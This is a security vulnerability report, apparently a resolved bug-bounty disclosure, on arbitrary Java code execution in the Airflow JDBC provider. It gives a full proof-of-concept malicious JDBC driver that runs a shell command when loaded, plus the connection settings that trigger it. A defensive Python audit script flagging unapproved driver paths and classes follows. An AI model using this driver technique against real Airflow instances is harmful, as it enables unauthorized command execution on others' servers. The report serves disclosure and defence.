JDBC Apache Airflow provider code execution vulnerability
Low
Vulnerability Details
In `airflow.providers.jdbc.hooks.jdbc.JdbcHook`, a privilege escalation vulnerability exists because the `Driver Path` and `Driver Class` parameters are controllable, which allows arbitrary Java code to be executed.
Vulnerability reproduction steps:
1. Create a malicious JDBC driver, like this:
```
import java.io.*;
import java.sql.*;
import java.util.Properties;
import java.util.logging.Logger;

public class Test implements Driver {
    static {
        try {
            cmd();
            DriverManager.registerDriver(new Test());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Connection connect(String url, Properties info) throws SQLException {
        return null;
    }

    @Override
    public boolean acceptsURL(String url) throws SQLException {
        try {
            cmd();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        // Check whether the URL is one this driver supports
        return url.startsWith("jdbc:mydb:");
    }

    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
        return new DriverPropertyInfo[0];
    }

    @Override
    public int getMajorVersion() {
        return 1;
    }

    @Override
    public int getMinorVersion() {
        return 0;
    }

    @Override
    public boolean jdbcCompliant() {
        return false;
    }

    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        return null;
    }

    public static void cmd() throws IOException {
        String[] cmd = {"sh", "-c", "whoami"};
        Process p = Runtime.getRuntime().exec(cmd);
        InputStream in = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        File outputFile = new File("/tmp/airflow-jdbc.txt");
        BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));
        String line;
        while ((line = reader.readLine()) != null) {
            writer.write(line);
            writer.newLine();
        }
        writer.close();
    }
}
```
Generate a jar package.
2. Configure the JDBC connection
Go to the Connection configuration page.
Fill in the `driver path` with the path of the jar package generated in the previous step.
Fill in the `driver class` with the value `Test`.
3. Click on the test button
Click on the test button and it can be observed that the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.
This is a screenshot of my email exchange with Airflow developers:
███
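A defensive check for the two fields this report abuses, as an added example that is not part of the original report or Airflow's own code: it audits stored connection extras and flags any driver path that resolves outside an approved directory or any driver class not on an allowlist. The approved directory, the class allowlist, the `driver_path`/`driver_class` key names, the comma-separated path handling and the sample connections are assumptions.

```python
import json
import os

# Assumptions, not values from the report: the approved jar directory, the class
# allowlist, and the extra-field key names.
APPROVED_DIR = "/opt/airflow/jdbc-drivers"
APPROVED_CLASSES = {"org.postgresql.Driver", "com.mysql.cj.jdbc.Driver"}
PATH_KEY, CLASS_KEY = "driver_path", "driver_class"
# Constructed sample connections: conn_id -> extra JSON as stored.
SAMPLE_CONNECTIONS = {
    "warehouse": '{"driver_path": "/opt/airflow/jdbc-drivers/postgresql.jar",'
                 ' "driver_class": "org.postgresql.Driver"}',
    "reported": '{"driver_path": "/tmp/Test.jar", "driver_class": "Test"}',
}


def check_jdbc_extra(extra_json):
    """Return findings for one connection's extra JSON; an empty list means OK."""
    try:
        extra = json.loads(extra_json or "{}")
    except ValueError:
        return ["extra is not valid JSON"]
    if not isinstance(extra, dict):
        return ["extra is not a JSON object"]
    findings = []
    root = os.path.realpath(APPROVED_DIR)
    paths = extra.get(PATH_KEY)
    if paths is not None and not isinstance(paths, str):
        findings.append(f"{PATH_KEY} is not a string")
        paths = None
    # Assumed: several jars may be given as a comma-separated list.
    for raw in (paths.split(",") if paths else []):
        # realpath collapses ".." and symlinks before the containment check.
        resolved = os.path.realpath(raw.strip())
        inside = os.path.commonpath([root, resolved]) == root
        if not (inside and resolved != root and resolved.endswith(".jar")):
            findings.append(f"{PATH_KEY} is not an approved jar: {raw.strip()}")
    cls = extra.get(CLASS_KEY)
    if cls is not None and (not isinstance(cls, str) or cls not in APPROVED_CLASSES):
        findings.append(f"{CLASS_KEY} not on allowlist: {cls!r}")
    return findings


def audit(connections):
    """Map conn_id -> findings for every connection that fails the check."""
    checked = {cid: check_jdbc_extra(extra) for cid, extra in connections.items()}
    return {cid: found for cid, found in checked.items() if found}
```

The same check can run as a gate before a connection is saved or tested, so a value like the one in step 2 is rejected before any driver is loaded.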
Report Stats
- Report ID: 2065288
- State: Closed
- Substate: resolved
- Upvotes: 6